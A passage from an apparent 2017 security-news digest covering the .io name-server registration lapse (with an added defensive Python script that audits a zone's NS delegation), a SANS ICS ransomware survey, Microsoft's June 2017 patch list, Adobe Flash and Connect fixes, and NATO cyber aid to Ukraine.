He also notes that, because the .io TLD has Domain Name System Security Extensions (DNSSEC) enabled, which adds security by enabling DNS responses to be validated, users should be defended from attackers able to send bad/forged DNS data. However, “DNSSEC support is pretty abysmal and I rarely encounter any support for it unless I specifically set a resolver up that supports it myself,” the researcher also points out.

According to Matt Pounsett, however, while the Backend Registry Operator for the .io TLD clearly made a big mistake by allowing a third-party to register the name servers, the issue “definitely does not constitute the catastrophe implied.” He explains that “the name servers for the .io TLD don't respond with their own NS set in their response,” meaning that attack won’t work as suggested.

The issue with the authoritative name servers was that the .io TLD apparently transitioned last month from the operators of the registry to a third party already in charge of the backend for other top-level domains. The third party, Afilias, got hold of three domain name servers, but left the other four available.
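The check Bryant describes above (enumerate the NS hostnames a zone delegates to, derive each one's registrable base domain, and verify that base domain is actually registered and under the operator's control) is something any zone operator can run against their own delegation, not only a TLD registry. The following added example is not code from the article or from the researcher; it implements that audit over a constructed delegation in which the four ns-a1.io to ns-a4.io names come from the article and the three example.net/example.org hosts are placeholders standing in for the remaining servers, whose real names the article does not give. The function names (`base_domain`, `audit_delegation`, `exposure`) are chosen for this example, and the one-label public-suffix assumption is a simplification that a real audit would replace with a Public Suffix List lookup.

```python
"""Audit a zone's NS set for name servers whose base domain is not under the
operator's control (added example, not the article's or researcher's code)."""


def base_domain(host, public_suffix_labels=1):
    """Registrable base domain of `host`.

    Assumes the public suffix is `public_suffix_labels` labels long (1 for
    .io/.net/.org, 2 for suffixes such as co.uk). A production audit should
    consult the Public Suffix List rather than this simplification.
    """
    labels = host.lower().rstrip(".").split(".")
    wanted = public_suffix_labels + 1
    if len(labels) < wanted:
        return None  # a bare TLD/public suffix: nothing registrable here
    return ".".join(labels[-wanted:])


def audit_delegation(zone, ns_hosts, controlled_domains, public_suffix_labels=1):
    """One record per NS hostname: its base domain, whether it sits inside the
    zone being delegated (in-bailiwick), and whether the operator holds it."""
    zone = zone.lower().rstrip(".")
    controlled = {d.lower().rstrip(".") for d in controlled_domains}
    report = []
    for ns in ns_hosts:
        host = ns.lower().rstrip(".")
        base = base_domain(host, public_suffix_labels)
        report.append({
            "ns": host,
            "base": base,
            # For a TLD, an in-bailiwick NS name is one the registry itself
            # must reserve; that is the case the article describes.
            "in_bailiwick": host.endswith("." + zone),
            "controlled": base in controlled,
        })
    return report


def exposure(report):
    """(uncontrolled, total): how much of the NS set rests on domains the
    operator does not hold. At or above half, a majority of answers could
    come from servers someone else registered."""
    uncontrolled = [r for r in report if not r["controlled"]]
    return len(uncontrolled), len(report)


# Constructed delegation: the four ns-aN.io names are from the article; the
# example.net/.org hosts are placeholders, not the real remaining .io servers.
SAMPLE_ZONE = "io"
SAMPLE_NS = ["ns-a1.io", "ns-a2.io", "ns-a3.io", "ns-a4.io",
             "ns1.example.net", "ns2.example.net", "ns1.example.org"]
# Base domains the operator knows it has registered (constructed).
SAMPLE_CONTROLLED = {"example.net", "example.org"}

if __name__ == "__main__":
    rep = audit_delegation(SAMPLE_ZONE, SAMPLE_NS, SAMPLE_CONTROLLED)
    for r in rep:
        flag = "ok" if r["controlled"] else "!!"
        where = "in-bailiwick" if r["in_bailiwick"] else "external"
        print(f"{flag} {r['ns']:20} base={r['base']:16} {where}")
    bad, total = exposure(rep)
    print(f"{bad}/{total} name servers depend on base domains outside operator control")
```

Run against the constructed sample, the audit reports 4 of 7 name servers as uncontrolled, the same ratio the article gives for the real .io delegation. The fix on the registry side is to treat every in-bailiwick NS base domain as reserved, and on any other operator's side to put those base domains under the same renewal monitoring as the zone itself. Pounsett's caveat stands: a registrable name-server domain is a genuine exposure, but what could be done with it depends on how the zone's servers answer, which this script does not model.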


ICS Security Pros Increasingly Concerned About Ransomware: Survey

11.7.2017 securityweek  ICS  Ransomware

Many security practitioners in the field of industrial control systems (ICS) believe the level of risk is high, and they are increasingly concerned about ransomware and embedded controllers, according to the SANS Institute’s fourth annual ICS cyber security survey.

ICS security experts from organizations of all sizes told SANS that they believe the top threat vectors are devices that cannot protect themselves, such as embedded controllers (44%), internal threats, including accidents (43%), external threats, such as nation-state actors and hacktivists (40%), and ransomware and other extortion attempts (35%).

Ransomware has made a lot of headlines in the past year and industrial systems are at risk, as demonstrated by both theoretical attack scenarios and in-the-wild threats such as the WannaCry malware. As a result, the number of ICS security experts concerned about ransomware has nearly doubled compared to data from the previous SANS survey.

“Although ransomware primarily infects commercial OS-based systems (e.g., Windows, Linux), the integration of these into ICS environments and the dependence of ICS on devices running these operating systems has extended ransomware’s effectiveness and reach,” SANS said in its report. “Publicly known operational impacts remain few to date but, we expect more to follow, especially given public demonstrations of ransomware targeting ICS/SCADA.”

Recent ICS hacking demonstrations also appear to have contributed to an increasing awareness that embedded controllers and control system applications are at risk – nearly one-quarter of respondents believe controllers are most at risk. On the other hand, many still believe that computers running commercial operating systems are most at risk and have the greatest impact.

Top ICS threat vectors

More than two-thirds of respondents believe the threat to ICS to be high or critical, and nearly half said their budgets for ICS security increased from the fiscal year 2016. Over the next 18 months, 20 percent or more of organizations have allocated budget for performing security assessments or audits of control systems, increasing visibility into these systems, increasing security awareness training, and implementing anomaly and intrusion detection tools.

“Budgets for training and certification of staff responsible for implementing and maintaining security of control systems and control fell considerably, from 34% in 2016 to 26% in 2017. Rather than balancing this with increases in trained staff or outside consultants, budgets for these initiatives decreased, dropping, at 14%, below the top 10 budgetary initiatives,” SANS said. “At a time of increasing exposures and risk factors, this is counterintuitive. Rising threat levels and expanding attack surfaces require skilled professionals to address these risks.”

Of the organizations with more than 10,000 employees, 2.6 percent said they have a budget of more than $10 million for control system security in the fiscal year 2017, and 6 percent said they have a budget ranging between $1 million and $10 million. On the other hand, 2.6 percent of large companies admitted they don’t have a budget for ICS security.

The fact that some organizations have allocated budget for improving visibility is encouraging, considering that when asked if their control systems have been infected or infiltrated, 40 percent of respondents said “not that we know of,” which suggests they may have been breached, but lack visibility into their operational technology (OT) network.

ICS infections

Roughly 12 percent of respondents said their control systems were infected or infiltrated in the past year. While most of them either did not know how many times their systems were breached or said they had only detected such events up to five times, some reported more than 50 incidents.


Microsoft Patch Tuesday – June 2017

11.7.2017 Symantec  Vulnerability blog 

This month the vendor has patched 94 vulnerabilities, 18 of which are rated Critical.
Hello, welcome to this month's blog on the Microsoft patch release.

As always, customers are advised to follow these security best practices:

Install vendor patches as soon as they are available.
Run all software with the least privileges required while still maintaining functionality.
Avoid handling files from unknown or questionable sources.
Never visit sites of unknown or questionable integrity.
Block external access at the network perimeter to all key systems unless specific access is required.
Microsoft's summary of the June 2017 releases can be found here:
https://portal.msrc.microsoft.com/en-us/security-guidance

This month's update covers vulnerabilities in:

Microsoft Internet Explorer
Microsoft Edge
Microsoft Office
Microsoft Hyper-V
Microsoft Uniscribe
Windows Graphics
Microsoft Windows
The following is a breakdown of the issues being addressed this month:

Cumulative Security Update for Microsoft Internet Explorer and Edge

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8496) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8497) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8517) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8520) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8522) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8524) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8548) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Remote Code Execution Vulnerability (CVE-2017-8549) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8499) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8519) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8521) MS Rating: Important

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8523) MS Rating: Important

A security bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. An attacker can exploit this issue to trick a user into loading a page with malicious content.

Microsoft Browser Information Disclosure Vulnerability (CVE-2017-8529) MS Rating: Important

An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8530) MS Rating: Important

A security bypass vulnerability that affects Microsoft Edge.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8547) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8555) MS Rating: Important

A security bypass vulnerability exists when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker can exploit this issue to trick a user into loading a web page with malicious content.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8498) MS Rating: Moderate

An information disclosure vulnerability exists in Microsoft Edge that allows JavaScript XML DOM objects to detect installed browser extensions. To exploit the vulnerability, in a web-based attack scenario, an attacker could host a malicious website in an attempt to make a user visit it.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8504) MS Rating: Low

An information disclosure vulnerability exists when the Microsoft Edge Fetch API incorrectly handles a filtered response type. An attacker could use the vulnerability to read the URL of a cross-origin request.

Cumulative Security Update for Microsoft Office

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-0260) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8506) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Memory Corruption Vulnerability (CVE-2017-8507) MS Rating: Important

A remote code execution vulnerability exists in the way that Microsoft Outlook parses specially crafted email messages. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Security Feature Bypass Vulnerability (CVE-2017-8508) MS Rating: Important

A security bypass vulnerability exists in Microsoft Office software when it improperly handles the parsing of file formats. The security bypass by itself does not allow arbitrary code execution.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8509) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8510) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8511) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8512) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2017-8513) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft SharePoint Reflective XSS Vulnerability (CVE-2017-8514) MS Rating: Important

A cross-site scripting vulnerability exists in Microsoft SharePoint Server because it fails to sufficiently sanitize user-supplied input. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

Microsoft Outlook for Mac Spoofing Vulnerability (CVE-2017-8545) MS Rating: Important

A spoofing vulnerability exists when Microsoft Outlook for Mac does not sanitize HTML or treat it in a safe manner. An attacker who successfully tricked the user could gain access to the user's authentication information or login credentials.

Microsoft SharePoint XSS vulnerability (CVE-2017-8551) MS Rating: Important

A privilege escalation vulnerability exists when SharePoint Server does not properly sanitize a specially crafted web request. An authenticated attacker could exploit the vulnerability by sending such a request to an affected SharePoint server; successful exploitation may allow the attacker to perform cross-site scripting attacks.

Cumulative Security Update for Microsoft Windows Hyper-V

Hypervisor Code Integrity Elevation of Privilege Vulnerability (CVE-2017-0193) MS Rating: Important

A privilege escalation vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels. An attacker who successfully exploited this issue could gain elevated privileges on a target guest operating system.

Cumulative Security Update for Skype for Business

Skype for Business Remote Code Execution Vulnerability (CVE-2017-8550) MS Rating: Critical

A remote code execution vulnerability exists when Skype for Business and Microsoft Lync Servers fail to properly sanitize specially crafted content. An authenticated attacker who successfully exploited this issue could execute HTML and JavaScript content in the Skype for Business or Lync context.

Cumulative Security Update for Microsoft Windows Uniscribe

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8527) MS Rating: Critical

A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8528) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-0283) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0282) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0284) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0285) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-8534) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Cumulative Security Update for Microsoft Windows Graphics

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0286) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0287) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0288) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0289) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8531) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8532) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8533) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Cumulative Security Update for Microsoft Windows Kernel-Mode Drivers

Windows Kernel Elevation of Privilege Vulnerability (CVE-2017-0297) MS Rating: Important

A privilege escalation vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited this issue could execute code with elevated permissions.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0299) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0300) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8462) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8465) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8468) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8469) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8470) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8471) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8472) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8473) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8474) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8475) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8476) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8477) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8478) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8479) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8480) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8481) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8482) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8483) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8484) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8485) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8488) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8489) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8490) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8491) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8492) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by running a specially crafted application.

Cumulative Security Update for Microsoft Windows

LNK Remote Code Execution Vulnerability (CVE-2017-8464) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this issue could gain the same user rights as the local user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0291) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0292) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows Remote Code Execution Vulnerability (CVE-2017-0294) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.

Windows Search Remote Code Execution Vulnerability (CVE-2017-8543) MS Rating: Critical

A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0173) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0215) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0216) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0218) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0219) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Windows Default Folder Tampering Vulnerability (CVE-2017-0295) MS Rating: Important

A tampering vulnerability exists in Microsoft Windows that could allow an authenticated attacker to modify the folder structure. An attacker who successfully exploited this issue could potentially modify files and folders that are synchronized the first time a user logs in locally to the computer.

Windows TDX Elevation of Privilege Vulnerability (CVE-2017-0296) MS Rating: Important

A privilege escalation vulnerability exists when tdx.sys fails to check the length of a buffer prior to copying memory to it.

Windows COM Session Elevation of Privilege Vulnerability (CVE-2017-0298) MS Rating: Important

A privilege escalation vulnerability exists in Windows when a DCOM object in Helppane.exe, configured to run as the interactive user, fails to properly authenticate the client.

Windows PDF Information Disclosure Vulnerability (CVE-2017-8460) MS Rating: Important

An information disclosure vulnerability exists in Microsoft Windows when a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could read information in the context of the current user.

Windows Cursor Elevation of Privilege Vulnerability (CVE-2017-8466) MS Rating: Important

A privilege escalation vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Security Feature Bypass Vulnerability (CVE-2017-8493) MS Rating: Important

A security bypass vulnerability exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks, which could allow an attacker to set variables that are either read-only or require authentication.

Windows Elevation of Privilege Vulnerability (CVE-2017-8494) MS Rating: Important

A privilege escalation vulnerability exists when Windows Secure Kernel Mode fails to properly handle objects in memory. To exploit the vulnerability, a locally authenticated attacker could attempt to run a specially crafted application on a targeted system.

Windows VAD Cloning Denial of Service Vulnerability (CVE-2017-8515) MS Rating: Important

A denial of service vulnerability exists in Microsoft Windows when an unauthenticated attacker sends a specially crafted kernel mode request. An attacker who successfully exploited this issue could cause a denial of service on the target system, causing the machine to either stop responding or reboot.

Windows Search Information Disclosure Vulnerability (CVE-2017-8544) MS Rating: Important

An information disclosure vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

GDI Information Disclosure Vulnerability (CVE-2017-8553) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.


Adobe Fixes Vulnerabilities in Flash Player, Connect

11.7.2017 securityweek Vulnerebility

Adobe today released updates for its Flash Player and Connect products to address several vulnerabilities that can be exploited for remote code execution, information disclosure, cross-site scripting (XSS) attacks, and clickjacking.

An advisory published by Adobe for Flash Player shows that version 26.0.0.137 patches three critical vulnerabilities, including ones that can be exploited to take control of affected systems.

The list includes a critical memory corruption flaw that can lead to remote code execution (CVE-2017-3099) and two important information disclosure weaknesses caused by memory corruption and security bypass issues (CVE-2017-3100 and CVE-2017-3080). Jihui Lu of Tencent KeenLab and a researcher who uses the online moniker “bo13oy” have been credited for finding CVE-2017-3099 and CVE-2017-3100, respectively.

In the case of the Connect web conferencing software, Adobe patched three less severe vulnerabilities. The security holes have been described as a user interface bug that can be exploited for clickjacking attacks (CVE-2017-3101) and input validation problems that can allow reflected and stored XSS attacks (CVE-2017-3102, CVE-2017-3103).

The flaws, discovered by Anas Roubi, Adam Willard of Raytheon Foreground Security, and Alexis Laborier, affect Connect for Windows and they have been patched with the release of version 9.6.2.

Adobe said it was not aware of any attacks exploiting these vulnerabilities, but pointed out that some details of the Flash Player flaw tracked as CVE-2017-3080 were made public on July 3.


NATO Providing Cybersecurity Equipment to Ukraine

11.7.2017 securityweek BigBrothers

NATO Takes Steps to Bolster Ukrainian Cyber Security

Ukraine is an area of great geopolitical significance -- a sort of buffer zone between NATO and Russia -- that both sides seek to influence. Crimea aside, neither side wishes to be too overt with military intervention, and the result is tailor-made for modern cyber warfare.

What remains of Ukraine is politically west-leaning and NATO-cooperative. This places Russia in the position of protagonist; and while it should be said that there is little direct proof of Russia-led cyber warfare, there is equally little doubt in the minds of many security researchers.

